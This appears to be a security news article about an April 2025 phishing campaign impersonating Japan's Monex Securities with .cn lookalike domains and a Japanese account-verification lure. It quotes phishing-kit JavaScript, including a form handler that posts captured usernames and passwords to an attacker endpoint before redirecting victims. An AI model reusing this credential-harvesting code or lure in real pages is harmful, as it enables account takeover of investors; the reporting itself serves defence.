New Phishing Campaign Attacking Investors to Steal Login Credentials

A sophisticated phishing campaign has emerged targeting users of Monex Securities, one of Japan’s largest online brokerage platforms formed through the merger of Monex, Inc. and Nikko Beans, Inc. Since early April 2025, attackers have deployed a series of fraudulent domains leveraging the .cn top-level domain to impersonate Monex’s legitimate services. These domains use randomized […] The post New Phishing Campaign Attacking Investors to Steal Login Credentials appeared first on Cyber Security News.

Apr 4, 2025 - 08:22

New Phishing Campaign Attacking Investors to Steal Login Credentials

A sophisticated phishing campaign has emerged targeting users of Monex Securities, one of Japan’s largest online brokerage platforms formed through the merger of Monex, Inc. and Nikko Beans, Inc.

Since early April 2025, attackers have deployed a series of fraudulent domains leveraging the .cn top-level domain to impersonate Monex’s legitimate services.

These domains use randomized alphanumeric strings in their root paths followed by the “/monex/” directory (e.g., hxxps://ijnu[.]cn/monex), creating URLs that superficially resemble authentic Monex subdomains.

The campaign employs socially engineered emails with the subject line “【マネックス証券】登録情報の確認および更新のお願い” (“[Monex Securities] Request to confirm and update registered information”), urging recipients to “verify account details” through embedded links.

Broadcom analysts observed that clicking these links redirects victims to fake login pages replicating Monex Securities’ authentication interface.

The pages dynamically adjust their layout using CSS media queries to match both desktop and mobile resolutions, increasing their credibility.

Attackers exfiltrate submitted credentials in real time through POST requests to attacker-controlled endpoints, enabling immediate account takeover attempts.

Infection Chain and Technical Infrastructure

The campaign’s operational infrastructure relies on disposable domains registered through Chinese TLD providers, with DNS records pointing to cloud-hosted virtual private servers (VPS).

Analysis of one phishing kit revealed a three-stage credential harvesting process:-

  document.addEventListener('DOMContentLoaded', function() {
    window.location.href = 'https://ijnu[.]cn/monex/login?session=' 
      + btoa(Date.now());
  });

This initial script generates a unique session identifier encoded in Base64, allowing attackers to track individual victims even if they abandon the login process prematurely.

The subsequent login form uses JavaScript validation to ensure password complexity requirements match Monex’s actual policies before transmitting credentials:-

// Credential submission handler
document.getElementById('loginForm').addEventListener('submit', function(e) {
  e.preventDefault();
  const creds = {
    user: document.getElementById('username').value,
    pass: document.getElementById('password').value
  };

  fetch('https://ijnu[.]cn/api/collect', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(creds)
  }).then(() => {
    window.location.href = 'https://monex-sec[.]com/error?code=503';
  });
});

This script exfiltrates credentials to /api/collect before redirecting victims to Monex’s legitimate error page, creating the illusion of a temporary service interruption rather than a security breach.

Symantec’s WebPulse-enabled products now block access to all identified infrastructure components, while their email security suite quarantines messages containing the malicious links.

Financial institutions are advised to implement multi-factor authentication (MFA) systems that bypass SMS-based codes, which this campaign’s infrastructure cannot currently intercept.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free

The post New Phishing Campaign Attacking Investors to Steal Login Credentials appeared first on Cyber Security News.